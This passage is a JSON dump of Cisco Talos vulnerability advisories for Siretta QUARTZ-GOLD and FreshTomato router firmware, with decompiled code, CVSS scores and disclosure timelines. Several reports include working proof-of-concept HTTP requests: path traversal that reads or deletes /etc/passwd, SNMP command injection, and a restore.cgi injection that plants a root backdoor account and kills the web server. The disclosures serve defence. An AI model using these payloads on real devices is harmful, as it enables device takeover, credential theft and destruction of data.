execution.\n\n##### TIMELINE\n\n2022-10-14 - Initial Vendor Contact\n\n2022-10-20 - Vendor Disclosure\n\n2022-11-24 - Vendor Patch Release\n\n2023-01-26 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2022-1612\n\nPrevious Report\n\nTALOS-2022-1615\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T00:00:00", "type": "talos", "title": "Siretta QUARTZ-GOLD httpd upload.cgi file write vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-39045"], "modified": "2023-01-26T00:00:00", "id": "TALOS-2022-1611", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1611", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:19:43", "description": "# Talos Vulnerability Report\n\n### TALOS-2022-1615\n\n## Siretta QUARTZ-GOLD httpd SNMP OS command injection vulnerability\n\n##### January 26, 2023\n\n##### CVE Number\n\nCVE-2022-38066\n\n##### SUMMARY\n\nAn OS command injection vulnerability exists in the httpd SNMP functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP response can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nSiretta QUARTZ-GOLD G5.0.1.5-210720-141020\n\n##### PRODUCT URLS\n\nQUARTZ-GOLD - <https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/>\n\n##### CVSSv3 SCORE\n\n7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-78 - Improper Neutralization of Special Elements used in an OS Command (\u2018OS Command Injection\u2019)\n\n##### DETAILS\n\nThe Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.\n\nBased on the web page shown, functionalities and the documentation publicly available, the QUARTZ-GOLD does not provide any way to directly access the linux system that runs on the router. The router has an SNMP service. This service sets custom OID, which are used to extend the SNMP functionalities. The specified entry is translated in the SNMP configuration file as an exec entry. This specifies arbitrary commands in the custom OID, and those are going to be executed when queried through SNMP, allowing arbitrary command execution.\n\nFollowing the function in the `rc` binary that manages the creation of the `/etc/snmpd.conf`:\n \n \n void start_snmpd(void)\n \n {\n [...]\n snmp_conf = fopen(\"/etc/snmpd.conf\",\"w\");\n [...]\n fputs(\"exec .1.3.6.1.4.1.2021.500 modem /bin/nvram get modem_type\\n\",snmp_conf);\n fputs(\"exec .1.3.6.1.4.1.2021.501 csq /bin/sh /tmp/csq.sh\\n\",snmp_conf);\n [...]\n fputs(\"exec .1.3.6.1.4.1.2021.535 sim_1_mode /bin/nvram get cellType\\n\",snmp_conf);\n fputs(\"exec .1.3.6.1.4.1.2021.536 sim_1_oper_lock /bin/nvram get cops_oper\\n\",snmp_conf);\n fputs(\"exec .1.3.6.1.4.1.2021.537 sim_1_pin /bin/nvram get CelldialPincode\\n\",snmp_conf);\n fputs(\"exec .1.3.6.1.4.1.2021.538 sim_1_apn /bin/nvram get CelldialApn\\n\",snmp_conf);\n fputs(\"exec .1.3.6.1.4.1.2021.539 sim_1_auth /bin/nvram get auth_type\\n\",snmp_conf);\n fputs(\"exec .1.3.6.1.4.1.2021.540 sim_1_user /bin/nvram get CelldialUser\\n\",snmp_conf);\n fputs(\"exec .1.3.6.1.4.1.2021.541 sim_1_passwd /bin/nvram get CelldialPwd\\n\",snmp_conf);\n fputs(\"exec .1.3.6.1.4.1.2021.542 sim_2_mode /bin/nvram get cellType2\\n\",snmp_conf);\n fputs(\"exec .1.3.6.1.4.1.2021.543 sim_2_oper_lock /bin/nvram get cops_oper2\\n\",snmp_conf);\n fputs(\"exec .1.3.6.1.4.1.2021.544 sim_2_pin /bin/nvram get CelldialPincode2\\n\",snmp_conf);\n fputs(\"exec .1.3.6.1.4.1.2021.545 sim_2_apn /bin/nvram get CelldialApn2\\n\",snmp_conf);\n fputs(\"exec .1.3.6.1.4.1.2021.546 sim_2_auth /bin/nvram get auth_type2\\n\",snmp_conf);\n fputs(\"exec .1.3.6.1.4.1.2021.547 sim_2_user /bin/nvram get CelldialUser2\\n\",snmp_conf);\n fputs(\"exec .1.3.6.1.4.1.2021.548 sim_2_passwd /bin/nvram get CelldialPwd2\\n\",snmp_conf);\n is_custom_empty = nvram_match_(\"custom_oid1\",\"\");\n if (is_custom_empty == 0) {\n custom_oid = nvram_get_(\"custom_oid1\");\n fprintf(snmp_conf,\"exec .1.3.6.1.4.1.2022.501 custom1 %s\\n\",custom_oid);\n }\n is_custom_empty = nvram_match_(\"custom_oid2\",\"\");\n if (is_custom_empty == 0) {\n custom_oid = nvram_get_(\"custom_oid2\");\n fprintf(snmp_conf,\"exec .1.3.6.1.4.1.2022.502 custom2 %s\\n\",custom_oid);\n }\n is_custom_empty = nvram_match_(\"custom_oid3\",\"\");\n if (is_custom_empty == 0) {\n custom_oid = nvram_get_(\"custom_oid3\");\n fprintf(snmp_conf,\"exec .1.3.6.1.4.1.2022.503 custom3 %s\\n\",custom_oid);\n }\n is_custom_empty = nvram_match_(\"custom_oid4\",\"\");\n if (is_custom_empty == 0) {\n custom_oid = nvram_get_(\"custom_oid4\");\n fprintf(snmp_conf,\"exec .1.3.6.1.4.1.2022.504 custom4 %s\\n\",custom_oid);\n }\n is_custom_empty = nvram_match_(\"custom_oid5\",\"\");\n if (is_custom_empty == 0) {\n custom_oid = nvram_get_(\"custom_oid5\");\n fprintf(snmp_conf,\"exec .1.3.6.1.4.1.2022.505 custom5 %s\\n\",custom_oid);\n }\n [...]\n return;\n }\n \n\nOne of the responsibilities of the `start_snmpd` function is to create the `/etc/snmpd.conf`. We removed the code unrelated to the `snmp.conf` and left only the part of the code related with the `exec` entries.\n\n### Exploit Proof of Concept\n\nSending a request like the following:\n \n \n POST /tomato.cgi HTTP/1.1\n Content-Length: 382\n Authorization: Basic <a valid basic auth>\n \n _ajax=1&_service=snmp-restart%2Cfirewall-restart&snmp_enable=1&snmp_remote=0&snmp_port=161&snmp_sysname=Siretta&snmp_location=router&snmp_contact=admin@router&snmp_ro=rocommunity&snmp_rw=rwcommunity&v3_auth_type=NONE&v3_auth_passwd=&v3_priv_type=NONE&v3_priv_passwd=&custom_oid1=/bin/cat%20/etc/passwd&custom_oid2=&custom_oid3=&custom_oid4=&custom_oid5=&_http_id=<the correct tid>\n \n\nWill generate the following response:\n \n \n HTTP/1.0 200 OK\n Date: Sat, 01 Jan 2000 05:41:39 GMT\n Content-Type: text/html; charset=utf-8\n Cache-Control: no-cache, no-store, must-revalidate, private\n Expires: Thu, 31 Dec 1970 00:00:00 GMT\n Pragma: no-cache\n Connection: close\n \n @msg:Settings saved.Some services are being restarted...% \n \n\nAfter this response, the SNMP server would be able to answer to the custom OID:\n \n \n snmpwalk -c public <ROUTER_IP> -v3 -u admin 1.3.6.1.4.1.2022.501 \n Bad operator (INTEGER): At line 73 in /usr/share/snmp/mibs/ietf/SNMPv2-PDU\n SNMPv2-SMI::enterprises.2022.501.1.1 = INTEGER: 1\n SNMPv2-SMI::enterprises.2022.501.2.1 = STRING: \"custom1\"\n SNMPv2-SMI::enterprises.2022.501.3.1 = STRING: \"/bin/cat /etc/passwd\"\n SNMPv2-SMI::enterprises.2022.501.100.1 = INTEGER: 0\n SNMPv2-SMI::enterprises.2022.501.101.1 = STRING: \"root:x:0:0:root:/root:/bin/sh\"\n SNMPv2-SMI::enterprises.2022.501.101.2 = STRING: \"admin:x:0:0:admin:/root:/bin/sh\"\n SNMPv2-SMI::enterprises.2022.501.101.3 = STRING: \"nobody:x:65534:65534:nobody:/dev/null:/dev/null\"\n SNMPv2-SMI::enterprises.2022.501.102.1 = INTEGER: 0\n SNMPv2-SMI::enterprises.2022.501.103.1 = \"\"\n \n\nThe value of this OID is the results of the command `/bin/cat /etc/passwd`.\n\n##### TIMELINE\n\n2022-10-14 - Initial Vendor Contact\n\n2022-10-20 - Vendor Disclosure\n\n2022-11-24 - Vendor Patch Release\n\n2023-01-26 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2022-1611\n\nPrevious Report\n\nTALOS-2022-1610\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T00:00:00", "type": "talos", "title": "Siretta QUARTZ-GOLD httpd SNMP OS command injection vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-38066"], "modified": "2023-01-26T00:00:00", "id": "TALOS-2022-1615", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1615", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:19:40", "description": "# Talos Vulnerability Report\n\n### TALOS-2022-1642\n\n## FreshTomato httpd update.cgi directory traversal vulnerability\n\n##### January 26, 2023\n\n##### CVE Number\n\nCVE-2022-38451\n\n##### SUMMARY\n\nA directory traversal vulnerability exists in the httpd update.cgi functionality of FreshTomato 2022.5. A specially crafted HTTP request can lead to arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nFreshTomato 2022.5 \nSiretta QUARTZ-GOLD G5.0.1.5-210720-141020 \nAdvancedTomato commit 67273b0\n\n##### PRODUCT URLS\n\nFreshTomato - <https://www.freshtomato.org/> QUARTZ-GOLD - <https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/>\n\n##### CVSSv3 SCORE\n\n6.8 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N\n\n##### CWE\n\nCWE-22 - Improper Limitation of a Pathname to a Restricted Directory (\u2018Path Traversal\u2019)\n\n##### DETAILS\n\nFreshTomato is an open source firmware based on linux. The firmware offers several features for Broadcom-based routers.\n\nThe FreshTomato\u2019s httpd component offers a simple template language to call an API during the loading of the HTML page. This process is performed through `asp api`. The `asp api` normally is not directly callable, but a FreshTomato\u2019s API called `update.cgi` will allow it.\n\nFollowing is one of the functions responsible for performing the `update.cgi` API:\n \n \n static void wo_update(char *url)\n {\n const aspapi_t *api;\n const char *name;\n int argc;\n char *argv[16];\n char s[32];\n \n if ((name = webcgi_get(\"exec\")) != NULL) {\n for (api = aspapi; api->name; ++api) {\n if (strcmp(api->name, name) == 0) {\n for (argc = 0; argc < 16; ++argc) {\n snprintf(s, sizeof(s), \"arg%d\", argc);\n if ((argv[argc] = (char *)webcgi_get(s)) == NULL) break;\n }\n api->exec(argc, argv);\n break;\n }\n }\n }\n }\n \n\nThe `wo_update` function will take an `exec` parameter, used to specify which `asp api` to call, and a variable number of parameters based on the `asp api` to be called. We are going to focus on the `notice` `asp api`. The function responsible for performing the `notice` action is called `asp_notice`:\n \n \n void asp_notice(int argc, char **argv)\n {\n char s[64];\n char buf[2048];\n \n if (argc != 1)\n return;\n \n snprintf(s, sizeof(s), \"/var/notice/%s\", argv[0]); [1]\n if (f_read_string(s, buf, sizeof(buf)) <= 0) [2]\n return;\n \n web_putj(buf);\n }\n \n\nThe function takes one argument. This function will take the argument passed (effectively a filename) and use it at `[1]` to compose the string `/var/notice/<argument passed>`. The composed string is used, at `[2]`, as argument of the `f_read_string` function, which will open the file and read its contents. Eventually, if the file exist, the `asp_notice` function will print out its contents.\n\nThe problem is that from `wo_update` up to the instruction at `[2]` no sanitization of the filename parameter is performed. If the `/var/notice` folder does exist, it would be possible to perform a path traversal to read any file in the file system.\n\n##### TIMELINE\n\n2022-10-19 - Vendor Disclosure\n\n2022-11-08 - Vendor Patch Release\n\n2023-01-26 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2022-1605\n\nPrevious Report\n\nTALOS-2022-1641\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2023-01-26T00:00:00", "type": "talos", "title": "FreshTomato httpd update.cgi directory traversal vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-38451"], "modified": "2023-01-26T00:00:00", "id": "TALOS-2022-1642", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1642", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-03T15:19:42", "description": "# Talos Vulnerability Report\n\n### TALOS-2022-1606\n\n## Siretta QUARTZ-GOLD httpd delfile.cgi directory traversal vulnerability\n\n##### January 26, 2023\n\n##### CVE Number\n\nCVE-2022-40701\n\n##### SUMMARY\n\nA directory traversal vulnerability exists in the httpd delfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file deletion. An attacker can send an HTTP request to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nSiretta QUARTZ-GOLD G5.0.1.5-210720-141020\n\n##### PRODUCT URLS\n\nQUARTZ-GOLD - <https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/>\n\n##### CVSSv3 SCORE\n\n6.5 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H\n\n##### CWE\n\nCWE-22 - Improper Limitation of a Pathname to a Restricted Directory (\u2018Path Traversal\u2019)\n\n##### DETAILS\n\nThe Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.\n\nThe QUARTZ-GOLD router has a web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.\n\nFollowing the API to delete a previously uploaded file:\n \n \n void delfile.cgi(void)\n \n {\n [...]\n \n [... calculate the value of the base_folder variable ...]\n _filename_param = (char *)webcgi_safeget(\"_filename\"); [1]\n filename_ = \"\";\n if (_filename_param != (char *)0x0) {\n filename_ = _filename_param;\n }\n if (*filename_ != '\\0') {\n sprintf(command_buff,\"rm -rf %s/%s\",base_folder,filename_); [2]\n system(command_buff); [3]\n }\n [...]\n }\n \n\nThe `delfile.cgi` expects one parameter called `_filename` that represents the filename of the desired file to be deleted. At `[1]` the uploaded parameter is taken and then used at `[2]`. From the fetch of the `_filename` parameter, at `[1]`, to its usage at `[2]` there is no sanitization of the parameter. Then at `[3]` the string `rm -rf <base_folder>/<_filename>` is used as parameter of the `system` function. This functionality is vulnerable to a path traversal, allowing the deletion of arbitrary files in the file-system.\n\n### Exploit Proof of Concept\n\nFor example, sending the following request:\n \n \n POST /delfile.cgi HTTP/1.1\n Authorization: Basic <a valid basic auth value>\n Content-Length: 55\n \n _filename=../../etc/passwd&_http_id=<the correct tid>\n \n\nwould prohibit access with SSH.\n\n##### TIMELINE\n\n2022-10-14 - Initial Vendor Contact\n\n2022-10-20 - Vendor Disclosure\n\n2022-11-24 - Vendor Patch Release\n\n2023-01-26 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2022-1607\n\nPrevious Report\n\nTALOS-2022-1605\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2023-01-26T00:00:00", "type": "talos", "title": "Siretta QUARTZ-GOLD httpd delfile.cgi directory traversal vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-40701"], "modified": "2023-01-26T00:00:00", "id": "TALOS-2022-1606", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1606", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:P"}}, {"lastseen": "2023-06-03T15:19:44", "description": "# Talos Vulnerability Report\n\n### TALOS-2022-1612\n\n## Siretta QUARTZ-GOLD httpd txt/restore.cgi OS command injection vulnerability\n\n##### January 26, 2023\n\n##### CVE Number\n\nCVE-2022-40220\n\n##### SUMMARY\n\nAn OS command injection vulnerability exists in the httpd txt/restore.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. An attacker can send an HTTP request to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nSiretta QUARTZ-GOLD G5.0.1.5-210720-141020\n\n##### PRODUCT URLS\n\nQUARTZ-GOLD - <https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/>\n\n##### CVSSv3 SCORE\n\n7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-78 - Improper Neutralization of Special Elements used in an OS Command (\u2018OS Command Injection\u2019)\n\n##### DETAILS\n\nThe Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP, LTE, WAN failover, and many others.\n\nThe QUARTZ-GOLD router has a web server with several functionalities. One functionality sets several nvram variables and then reboots the router.\n\nThis functionality is allowed through the `txt/restore.cgi` API. Following one of the functions involved in executing this API:\n \n \n void wi_restore_custom(char* url,size_t len)\n \n {\n [...]\n \n read_len = len;\n [...]\n tmp_dir_path[0] = '\\0';\n data_pointer = (void *)skip_header(&read_len);\n if (data_pointer != (void *)0x0) {\n [...]\n data_pointer = malloc(read_len);\n [...]\n is_same = web_read(data_pointer,read_len);\n read_len = read_len - is_same;\n strcpy(tmp_dir_path,\"/tmp/nvram_restoreXXXXXX\");\n mktemp(tmp_dir_path);\n iVar1 = f_write(tmp_dir_path,data_pointer,is_same,0,0x180); [1]\n [...]\n tmp_dir_fd = fopen(tmp_dir_path,\"r\");\n if (tmp_dir_fd != (FILE *)0x0) {\n while (buffer = fgets(web_data,0x200,tmp_dir_fd), buffer != (char *)0x0) {\n buffer = strdup(web_data);\n if (buffer == (char *)0x0) goto LAB_00016940;\n is_same = _vstrsep(buffer,\"=\",&nvram_key,&nvram_value,0); [2]\n if ((((1 < is_same) && (is_same = strcmp(nvram_key,\"routersn\"), is_same != 0)) &&\n (is_same = strcmp(nvram_key,\"et0macaddr\"), is_same != 0)) &&\n (((is_same = strcmp(nvram_key,\"lan_hwaddr\"), is_same != 0 &&\n (is_same = strcmp(nvram_key,\"wan_hwaddr\"), is_same != 0)) &&\n (is_same = strcmp(nvram_key,\"wl0_hwaddr\"), is_same != 0)))) {\n sprintf(system_command,\"nvram set %s=%s\",nvram_key,nvram_value); [3]\n system(system_command); [4]\n memset(web_data,0,0x200);\n [...]\n }\n [...]\n }\n \n\n`wi_restore_custom` will, at `[1]`, write the request\u2019s body into a temporary file. The request\u2019s body should contain a series of lines of the `<nvaram_key>=<nvram_value>` format. Indeed, at `[2]`, a line of the request\u2019s body is parsed and split in two parts: the nvram key and the nvram value. At `[3]` the `nvram set <parsed_nvram_key>=<parsed_nvram_value>` string is composed; then it is executed at `[4]` using the `system` function.\n\nNo command injection related checks are performed on the, supposedly, `nvram_key` and the `nvram_value`. This means that any value will reach the `system` function without command injection related checks. Because of this the `wi_restore_custom` function is vulnerable to an OS command injection. This vulnerability can lead to arbitrary command execution.\n\n### Exploit Proof of Concept\n\nSending a request like the following:\n \n \n POST /txt/restore.cgi?_http_id=<a valid TID> HTTP/1.1\n Authorization: Basic <a valid basic auth>\n Content-Length: 428\n Content-Type: multipart/form-data; boundary=c6ced257295a2b54067e956663d1fbda\n \n --c6ced257295a2b54067e956663d1fbda\n Content-Disposition: form-data; name=\"content\"; filename=\"content\"\n \n AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA `echo \"\">>/etc/passwd; echo \"poc:x:0:0:root:/root:/bin/sh\" >> /etc/passwd; echo \"\" >> /etc/shadow; echo 'poc:$1$HSeR2q0g$KOjqL5H5DKyLpf0H1apr51:0:0:99999:7:0:0:'>> /etc/shadow; while [ 1 ]; do killall httpd; done`=POC\n --c6ced257295a2b54067e956663d1fbda--\n \n\nIf the request was successful, it is now possible to access the device using `poc:admin` as credentials. For instance connecting, using telnet, to port 2323 we can provide the injected credentials:\n \n \n telnet 192.168.0.1 2323\n Trying 192.168.0.1...\n Connected to 192.168.0.1.\n Escape character is '^]'.\n QUARTZ-GOLD login: poc\n Password: \n \n root@QUARTZ-GOLD:/tmp/home/root#\n \n\n##### TIMELINE\n\n2022-10-14 - Initial Vendor Contact\n\n2022-10-20 - Vendor Disclosure\n\n2022-11-24 - Vendor Patch Release\n\n2023-01-26 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2022-1613\n\nPrevious Report\n\nTALOS-2022-1611\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T00:00:00", "type": "talos", "title": "Siretta QUARTZ-GOLD httpd txt/restore.cgi OS command injection vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-40220"], "modified": "2023-01-26T00:00:00", "id": "TALOS-2022-1612", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1612", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:19:42", "description": "# Talos Vulnerability Report\n\n### TALOS-2022-1609\n\n## Siretta QUARTZ-GOLD httpd downfile.cgi directory traversal vulnerability\n\n##### January 26, 2023\n\n##### CVE Number\n\nCVE-2022-38088\n\n##### SUMMARY\n\nA directory traversal vulnerability exists in the httpd downfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nSiretta QUARTZ-GOLD G5.0.1.5-210720-141020\n\n##### PRODUCT URLS\n\nQUARTZ-GOLD - <https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/>\n\n##### CVSSv3 SCORE\n\n4.9 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N\n\n##### CWE\n\nCWE-22 - Improper Limitation of a Pathname to a Restricted Directory (\u2018Path Traversal\u2019)\n\n##### DETAILS\n\nThe Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.\n\nThe QUARTZ-GOLD router has a web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.\n\nFollowing the API to download a previously uploaded file:\n \n \n void downfile.cgi(void)\n \n {\n [...]\n \n _filename_param = (char *)webcgi_safeget(\"_filename\"); [1]\n filename = \"\";\n if (_filename_param != (char *)0x0) {\n filename = _filename_param;\n }\n [... calculate base_folder ...]\n if (*filename != '\\0') {\n sprintf(buff,\"Content-Disposition:attachment;filename=\\\"%s\\\"\",(char)filename);\n send_header(200,buff,\"application/tomato-binary-file\",0);\n sprintf(buff,\"%s/%s\",base_folder,filename); [2]\n do_file(buff); [3]\n }\n return;\n }\n \n\nThe `downfile.cgi` expects one parameter called `_filename` that represents the filename of the desired file to be downloaded. At `[1]` the uploaded parameter is taken and then used at `[2]` to compose the string `<base_folder>/<_filename>`. Then, at `[3]`, the specified file is sent in the HTTP response. From `[1]` to `[2]` no sanitization for the `_filename` parameter is performed, which can lead to a path traversal vulnerability, allowing an attacker to download any file of the file system.\n\n### Exploit Proof of Concept\n\nSending the following request to the web server:\n \n \n POST /downfile.cgi HTTP/1.1\n Authorization: Basic <a valid basic auth>\n Content-Length: 55\n \n _filename=../../etc/passwd&_http_id=<the correct tid>\n \n\nWould result in the web server sending the following response:\n \n \n HTTP/1.0 200 OK\n Date: Sat, 01 Jan 2000 03:33:42 GMT\n Content-Type: application/tomato-binary-file\n Cache-Control: no-cache, no-store, must-revalidate, private\n Expires: Thu, 31 Dec 1970 00:00:00 GMT\n Pragma: no-cache\n Content-Disposition:attachment;filename=\"../../etc/passwd\"\n Connection: close\n \n root:x:0:0:root:/root:/bin/sh\n admin:x:0:0:admin:/root:/bin/sh\n nobody:x:65534:65534:nobody:/dev/null:/dev/null\n \n\nThe response for this request is the contents of `/etc/passwd`.\n\n##### TIMELINE\n\n2022-10-14 - Initial Vendor Contact\n\n2022-10-20 - Vendor Disclosure\n\n2022-11-24 - Vendor Patch Release\n\n2023-01-26 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of 